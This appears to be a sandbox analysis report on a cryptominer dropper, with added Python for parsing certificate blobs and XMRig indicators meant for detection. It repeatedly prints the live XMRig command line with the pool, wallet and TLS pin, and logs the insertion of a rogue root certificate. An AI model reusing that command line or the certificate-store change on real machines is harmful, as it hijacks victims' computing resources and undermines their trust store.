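REPORT_BLOB_PREFIX = bytes.fromhex(
    "1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2"
    "030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349"
    "1d00000001000000100000002e0d6875874a44c820912e85e964cfdb"
    "140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4"
    "0b000000010000001c0000005300650063007400690067006f002000280041004100410029000000"
)
# Constructed stand-in for a DER certificate (one 16-byte SEQUENCE, not a real
# certificate) so the thumbprint check can be exercised on a blob that carries one.
FAKE_CERT = b"\x30\x10" + bytes(range(16))
FAKE_KEY_NAME = hashlib.sha1(FAKE_CERT).hexdigest().upper()


def parse_cert_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the property records; raises ValueError on a malformed or truncated blob."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        pid, reserved, cb = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"reserved field is {reserved}, expected 1 (offset {off - 8})")
        if off + cb > len(blob):
            raise ValueError(f"property 0x{pid:02x} claims {cb} bytes past end of blob")
        props[pid] = blob[off:off + cb]
        off += cb
    return props


def der_is_complete_sequence(der: bytes) -> bool:
    """True when der is exactly one DER SEQUENCE whose encoded length matches its size."""
    if len(der) < 2 or der[0] != 0x30:
        return False
    first = der[1]
    if first < 0x80:
        return len(der) == 2 + first
    n = first & 0x7F
    if n == 0 or n > 4 or len(der) < 2 + n:
        return False
    return len(der) == 2 + n + int.from_bytes(der[2:2 + n], "big")


def build_cert_blob(cert_der: bytes, friendly_name: str) -> bytes:
    """Constructed blob in the same record layout: SHA-1, friendly name, certificate."""
    def rec(pid: int, data: bytes) -> bytes:
        return struct.pack("<III", pid, 1, len(data)) + data
    return (rec(0x03, hashlib.sha1(cert_der).digest())
            + rec(0x0B, (friendly_name + "\x00").encode("utf-16-le"))
            + rec(0x20, cert_der))


def summarize_blob(key_name: str, blob: bytes) -> dict:
    """Checks a responder wants: key name == stored SHA-1 == SHA-1 of the DER certificate."""
    props = parse_cert_blob(blob)
    out: dict = {
        "properties": [PROP_NAMES.get(p, f"0x{p:02x}") for p in props],
        "friendly_name": None,
        "stored_sha1": None,
        "stored_sha1_matches_key": False,
        "cert_sha1_matches_key": None,  # None when no certificate record is present
        "cert_is_single_der_sequence": None,
    }
    if 0x0B in props:
        out["friendly_name"] = props[0x0B].decode("utf-16-le").rstrip("\x00")
    if 0x03 in props:
        out["stored_sha1"] = props[0x03].hex().upper()
        out["stored_sha1_matches_key"] = out["stored_sha1"] == key_name.upper()
    cert = props.get(0x20)
    if cert is not None:
        out["cert_sha1_matches_key"] = hashlib.sha1(cert).hexdigest().upper() == key_name.upper()
        out["cert_is_single_der_sequence"] = der_is_complete_sequence(cert)
    return out


if __name__ == "__main__":
    print(summarize_blob(REPORT_KEY_NAME, REPORT_BLOB_PREFIX))
    print(summarize_blob(FAKE_KEY_NAME, build_cert_blob(FAKE_CERT, "Constructed root")))
```

On the logged prefix the stored SHA-1 equals the key name and the friendly name decodes to "Sectigo (AAA)"; a blob whose key name, stored hash and certificate hash disagree, or whose certificate record is not a single well-formed DER SEQUENCE, is the case that deserves escalation.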
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1836 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1836 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
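All three detonations launch the dropped miner with the same command line, and the indicators a responder wants are in it: the pool host and port, the Monero payout address passed as --user, the pool password T, the donate level, and --tls together with --tls-fingerprint. Two details matter for detection. The pool is contacted on port 80 but the session is TLS carrying Stratum, not HTTP, so a rule that keys on port 80 as web traffic, or on the usual mining ports, sees nothing; the Network table shows the TCP connection to pool.hashvault.pro on port 80 and nothing that distinguishes it from plain HTTP. And --tls-fingerprint pins the SHA-256 of the pool certificate, so a TLS-inspecting proxy stops the miner from connecting, while the pinned value is a stable hunt key across samples built with this configuration. The parser below is an added example for this page, not code from the sandbox or from XMRig; the option names are XMRig's, the embedded command line is the one recorded above, and the second input in the usage is constructed.

```python
"""Pull mining indicators out of an XMRig command line as a sandbox records it."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Monero base58 alphabet (no 0, O, I, l). A standard address is 95 characters and
# starts with '4' (primary address) or '8' (subaddress).
_B58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")

# XMRig options that take a value, mapped to a canonical key.
_VALUE_OPTS = {
    "-o": "url", "--url": "url",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "-a": "algo", "--algo": "algo",
    "--coin": "coin",
    "--donate-level": "donate",
    "--tls-fingerprint": "tls_fp",
}
# XMRig boolean switches.
_FLAG_OPTS = {"--tls": "tls", "-k": "keepalive", "--keepalive": "keepalive",
              "-B": "background", "--background": "background"}

# The miner command line recorded under Processes in this report.
REPORT_CMDLINE = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)


@dataclass
class XmrigIocs:
    pool_host: str | None = None
    pool_port: int | None = None
    wallet: str | None = None
    password: str | None = None
    tls: bool = False
    tls_fingerprint: str | None = None
    donate_level: int | None = None
    notes: list[str] = field(default_factory=list)


def is_monero_address(s: str) -> bool:
    return len(s) == 95 and s[0] in "48" and all(c in _B58 for c in s)


def split_pool_url(url: str) -> tuple[str, int | None]:
    """'stratum+ssl://host:port', 'host:port' or a bare 'host' -> (host, port)."""
    url = re.sub(r"^[a-z0-9+.-]+://", "", url, flags=re.I)
    host, sep, port = url.rpartition(":")
    if not sep:
        return url, None
    return host, (int(port) if port.isdigit() else None)


def parse_xmrig_cmdline(cmdline: str) -> XmrigIocs:
    argv = cmdline.split()  # the recorded line carries no quoted arguments
    opts: dict[str, str] = {}
    flags: set[str] = set()
    i = 1  # argv[0] is the miner binary itself
    while i < len(argv):
        tok = argv[i]
        name, eq, val = tok.partition("=")
        if eq and name in _VALUE_OPTS:                   # --url=host:port form
            opts[_VALUE_OPTS[name]] = val
        elif tok in _VALUE_OPTS and i + 1 < len(argv):   # --url host:port form
            opts[_VALUE_OPTS[tok]] = argv[i + 1]
            i += 1
        elif tok in _FLAG_OPTS:
            flags.add(_FLAG_OPTS[tok])
        i += 1

    ioc = XmrigIocs()
    if "url" in opts:
        ioc.pool_host, ioc.pool_port = split_pool_url(opts["url"])
        if opts["url"].lower().startswith("stratum+ssl://"):
            flags.add("tls")  # the URL scheme alone turns TLS on
    ioc.wallet = opts.get("user")
    ioc.password = opts.get("pass")
    ioc.tls = "tls" in flags
    ioc.tls_fingerprint = opts.get("tls_fp")
    if opts.get("donate", "").isdigit():
        ioc.donate_level = int(opts["donate"])

    # Analyst notes: the things a port- or protocol-based detection gets wrong.
    if ioc.wallet and not is_monero_address(ioc.wallet):
        ioc.notes.append("user is not a standard Monero address (pool login or another coin)")
    if ioc.tls and ioc.pool_port in (80, 8080, 443):
        ioc.notes.append("TLS Stratum on a web port: port-based detection alone misses it")
    if ioc.tls_fingerprint:
        ioc.notes.append("pool certificate pinned: TLS inspection breaks the miner; the pin is a hunt key")
    return ioc


if __name__ == "__main__":
    print(parse_xmrig_cmdline(REPORT_CMDLINE))
    # Constructed variant: TLS via the URL scheme and a pool login instead of a wallet.
    print(parse_xmrig_cmdline("xmrig -o stratum+ssl://pool.example.net:443 -u worker1 -p x"))
```

For the recorded line this yields pool.hashvault.pro on port 80 with TLS on, a syntactically valid 95-character Monero address, and the 64-hex-digit certificate pin; feed the same parser the command lines from the other detonations and the identical wallet and pin tie the samples together even when the pool hostname changes.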
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1528 wrote to memory of 4416 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1528 wrote to memory of 4416 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:28
Platform
win10v2004-20240226-en
Max time kernel
1798s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1964 wrote to memory of 3844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1964 wrote to memory of 3844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4948 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3864 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:28
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2116 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2116 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2776-69-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-70-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-71-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-72-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-73-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-74-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-75-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-76-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-77-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-78-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-79-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-80-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-81-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-82-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-83-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
memory/2776-84-0x00007FF67F110000-0x00007FF67FC13000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:28
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
